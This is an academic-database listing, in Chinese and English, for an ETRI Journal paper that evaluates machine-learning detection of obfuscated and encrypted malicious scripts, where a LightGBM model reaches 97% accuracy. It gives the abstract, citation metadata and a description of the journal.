基于特征优化的人工智能模糊加密恶意脚本检测性能评估

IF 1.6 4区计算机科学 Q3 ENGINEERING, ELECTRICAL & ELECTRONIC

ETRI Journal Pub Date : 2024-12-08 DOI:10.4218/etrij.2024-0255

Kookjin Kim, Jisoo Shin, Jong-Geun Park, Jung-Tae Kim

{"title":"基于特征优化的人工智能模糊加密恶意脚本检测性能评估","authors":"Kookjin Kim, Jisoo Shin, Jong-Geun Park, Jung-Tae Kim","doi":"10.4218/etrij.2024-0255","DOIUrl":null,"url":null,"abstract":"<p>In the digital security environment, the obfuscation and encryption of malicious scripts are primary attack methods used to evade detection. These scripts—easily spread through websites, emails, and file downloads—can be automatically executed on users' systems, posing serious security threats. To overcome the limitations of signature-based detection methods, this study proposed a methodology for real-time detection of obfuscated and encrypted malicious scripts using ML/DL models with feature optimization techniques. The obfuscated script datasets were analyzed to identify the unique characteristics, classified into 16 feature sets, to evaluate the optimal features for the best detection accuracy. Although the detection accuracy of these datasets was < 20%, when tested with commercial antivirus services, the experimental results using ML and DL models demonstrated that the proposed light gradient boosting model (LGBM) could achieve the best detection accuracy and processing speed. The LGBM outperformed other artificial intelligence models by achieving 97% accuracy and the minimum processing time in the decoded, obfuscated, and encrypted dataset cases.</p>","PeriodicalId":11901,"journal":{"name":"ETRI Journal","volume":"47 4","pages":"753-770"},"PeriodicalIF":1.6000,"publicationDate":"2024-12-08","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"https://onlinelibrary.wiley.com/doi/epdf/10.4218/etrij.2024-0255","citationCount":"0","resultStr":"{\"title\":\"Performance evaluations of AI-based obfuscated and encrypted malicious script detection with feature optimization\",\"authors\":\"Kookjin Kim, Jisoo Shin, Jong-Geun Park, Jung-Tae Kim\",\"doi\":\"10.4218/etrij.2024-0255\",\"DOIUrl\":null,\"url\":null,\"abstract\":\"<p>In the digital security environment, the obfuscation and encryption of malicious scripts are primary attack methods used to evade detection. These scripts—easily spread through websites, emails, and file downloads—can be automatically executed on users' systems, posing serious security threats. To overcome the limitations of signature-based detection methods, this study proposed a methodology for real-time detection of obfuscated and encrypted malicious scripts using ML/DL models with feature optimization techniques. The obfuscated script datasets were analyzed to identify the unique characteristics, classified into 16 feature sets, to evaluate the optimal features for the best detection accuracy. Although the detection accuracy of these datasets was < 20%, when tested with commercial antivirus services, the experimental results using ML and DL models demonstrated that the proposed light gradient boosting model (LGBM) could achieve the best detection accuracy and processing speed. The LGBM outperformed other artificial intelligence models by achieving 97% accuracy and the minimum processing time in the decoded, obfuscated, and encrypted dataset cases.</p>\",\"PeriodicalId\":11901,\"journal\":{\"name\":\"ETRI Journal\",\"volume\":\"47 4\",\"pages\":\"753-770\"},\"PeriodicalIF\":1.6000,\"publicationDate\":\"2024-12-08\",\"publicationTypes\":\"Journal Article\",\"fieldsOfStudy\":null,\"isOpenAccess\":false,\"openAccessPdf\":\"https://onlinelibrary.wiley.com/doi/epdf/10.4218/etrij.2024-0255\",\"citationCount\":\"0\",\"resultStr\":null,\"platform\":\"Semanticscholar\",\"paperid\":null,\"PeriodicalName\":\"ETRI Journal\",\"FirstCategoryId\":\"94\",\"ListUrlMain\":\"https://onlinelibrary.wiley.com/doi/10.4218/etrij.2024-0255\",\"RegionNum\":4,\"RegionCategory\":\"计算机科学\",\"ArticlePicture\":[],\"TitleCN\":null,\"AbstractTextCN\":null,\"PMCID\":null,\"EPubDate\":\"\",\"PubModel\":\"\",\"JCR\":\"Q3\",\"JCRName\":\"ENGINEERING, ELECTRICAL & ELECTRONIC\",\"Score\":null,\"Total\":0}","platform":"Semanticscholar","paperid":null,"PeriodicalName":"ETRI Journal","FirstCategoryId":"94","ListUrlMain":"https://onlinelibrary.wiley.com/doi/10.4218/etrij.2024-0255","RegionNum":4,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"Q3","JCRName":"ENGINEERING, ELECTRICAL & ELECTRONIC","Score":null,"Total":0}

引用次数: 0

摘要

在数字安全环境中，对恶意脚本进行混淆和加密是逃避检测的主要攻击手段。这些脚本很容易通过网站、电子邮件和文件下载传播，可以在用户系统上自动执行，造成严重的安全威胁。为了克服基于签名的检测方法的局限性，本研究提出了一种使用ML/DL模型和特征优化技术实时检测混淆和加密恶意脚本的方法。对混淆后的脚本数据集进行分析，识别出其独特的特征，并将其分为16个特征集，以评估最优特征以获得最佳的检测精度。虽然这些数据集的检测精度为<；20%的实验结果表明，本文提出的光梯度增强模型（LGBM）可以达到最佳的检测精度和处理速度。LGBM在解码、混淆和加密数据集的情况下，准确率达到97%，处理时间最短，优于其他人工智能模型。

本文章由计算机程序翻译，如有差异，请以英文原文为准。

Performance evaluations of AI-based obfuscated and encrypted malicious script detection with feature optimization

查看原文本刊更多论文

Performance evaluations of AI-based obfuscated and encrypted malicious script detection with feature optimization

In the digital security environment, the obfuscation and encryption of malicious scripts are primary attack methods used to evade detection. These scripts—easily spread through websites, emails, and file downloads—can be automatically executed on users' systems, posing serious security threats. To overcome the limitations of signature-based detection methods, this study proposed a methodology for real-time detection of obfuscated and encrypted malicious scripts using ML/DL models with feature optimization techniques. The obfuscated script datasets were analyzed to identify the unique characteristics, classified into 16 feature sets, to evaluate the optimal features for the best detection accuracy. Although the detection accuracy of these datasets was < 20%, when tested with commercial antivirus services, the experimental results using ML and DL models demonstrated that the proposed light gradient boosting model (LGBM) could achieve the best detection accuracy and processing speed. The LGBM outperformed other artificial intelligence models by achieving 97% accuracy and the minimum processing time in the decoded, obfuscated, and encrypted dataset cases.

求助全文

通过发布文献求助，成功后即可免费获取论文全文。去求助

来源期刊

ETRI Journal 工程技术-电信学

CiteScore

4.00

自引率

7.10%

发文量

审稿时长

6.9 months

期刊介绍： ETRI Journal is an international, peer-reviewed multidisciplinary journal published bimonthly in English. The main focus of the journal is to provide an open forum to exchange innovative ideas and technology in the fields of information, telecommunications, and electronics. Key topics of interest include high-performance computing, big data analytics, cloud computing, multimedia technology, communication networks and services, wireless communications and mobile computing, material and component technology, as well as security. With an international editorial committee and experts from around the world as reviewers, ETRI Journal publishes high-quality research papers on the latest and best developments from the global community.